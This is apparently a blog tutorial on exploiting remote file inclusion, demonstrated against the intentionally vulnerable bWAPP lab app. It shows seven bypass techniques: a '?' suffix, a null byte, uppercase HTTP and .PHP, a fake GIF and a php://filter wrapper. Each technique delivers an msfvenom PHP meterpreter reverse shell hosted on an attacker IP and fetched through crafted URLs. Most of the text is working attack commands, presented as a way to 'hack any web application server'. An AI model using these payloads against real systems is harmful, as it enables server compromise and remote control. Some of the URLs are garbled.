In this article you will learn how to hack any web
application server if it is suffering from remote file inclusion vulnerability. I have performed RFI attack using seven
different techniques to exploit any web server. Here I have targeted BWAPP
which a buggy web application server to perform all these attack.
Remote File
Inclusion (also
known as RFI) is the process of including remote files through the exploiting
of vulnerable inclusion procedures implemented in the application. This
vulnerability occurs, for example, when a page receives, as input, the path to
the file that has to be included and this input is not properly sanitized,
allowing external URL to be injected. Although most examples point to
vulnerable PHP scripts, we should keep in mind that it is also common in other
technologies such as JSP, ASP and others.
For more details visit OWASP.org
Let’s Begin!!!
Basic RFI Attack
Open target IP in the browser and login
inside BWAPP as bee: bug now choose the bug remote & local file
Inclusion then
click on hack.
Here
the requested web page which is suffering from RFI & LFI Vulnerability gets
open. Where you will find a comment to select a language from the given drop
down list, when you click on go button the selected language file
get included in URL.
Now prepare PHP malicious file using msfvenom for attack and
start multi handler at the
background.
Msfvenom –p
php/meterpreter/reverse _tcp lhost= 192.168.1.11 lport 4444 –f raw
Then copy the highlighted text in a text file.
If
you notice the below screenshot carefully here you will find that I have saved above
copied PHP code as shell.php inside
/var/www/html, so that shell.php file could be included for RFI attack.
To perform basic attacks manipulate URL to include php
file remotely.
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.php
As soon as you will execute the URL, you will get reverse
connection through meterpreter session.
Meterpreter>
sysinfo
Forced Extension RFI
Attack
Repeat the same process and add ‘?’ (Question mark) symbol at
the end of URL. Must remember that multi
handler should be running at the
background of metasploit framework.
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.php?
Again when you will execute URL, it will give you another
meterpreter session.
Meterpreter>
sysinfo
Null Byte RFI Attack
Now
to make null byte attack you need to capture the sending request between
browser and web server. Here to perform the attack with help of burp suite
kindly turn on burp suite then make intercept on and set browser proxy. From
given screenshot you can see I have captured the GET request.
Again
if you notice the highlighted text in the given below image you will find that
I have edited ‘’ (null character)
to make null injection attack. Now before forwarding the GET request make sure
your multi handler must be running at the background and then click on forward tab.
As soon as they GET request will be forward you will get
victim’s reverse connection through meterpreter sessions.
Meterpreter>
sysinfo
Change HTTP
The forth technique is similar to the first technique the
attacker just need to make very small change in URL and if you notice the
following screenshot you will find that I have changed http into HTTP. It might be possible that in some
situation when security level get increased small character http get failed to
include file remotely.
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=HTTP://192.168.1.11/shell.php
So after making changes now execute the URL and must keep
multi handler running at the background which will further provide a new
session again through meterpreter.
Meterpreter>
sysinfo
Change Image Extension
In next attack you will find that I had included an image
remotely to hack web application server which is not a real image but our php
malicious file. So now open your shell.php file and edit GIF98 inside your PHP file as shown in
following screenshot and save it as shell.gif
at same location i.e. /var/www/html.
Here again make small change in URL to include malicious
image.
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.gif
Now when again you will execute URL, another meterpreter
session gets open for you.
Meterpreter>
sysinfo
Black List RFI Attack
If
you have read file uploading article you
must be aware of black list where we can inject our file by changing a number
of letters to their capital forms to bypass the case sensitive rule, for
example PHP or PHP3
You can apply this technique when security level is high,
manipulate .php into .PHP; I have renamed shell.php into shell.PHP at same location and then
execute shell.PHP with help of URL.
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.PHP
From following screenshot you can see I have got another
session through meterpreter.
Meterpreter>
sysinfo
Base64 encoded
Now there is another way to exploit RFI when the
security level is high and you are unable to view the PHP file content, and
then use the following PHP function.
With help of hackbar which a Firefox plug-in I had
performed this attack. First you need to load
URL then manipulate URL as shown
in the screenshot then click on execute tab.
http://192.168.1.113/bWAPP/rlfi.php?language= php://filter/read=convert.base64-encode/resource= http://192.168.1.11/shell.php
WONDERFUL!!!
We have got meterpreter session through seven different techniques. You can
also perform all these attack using online script like c99 shell.
Meterpreter>
sysinfo
0 comments:
Post a Comment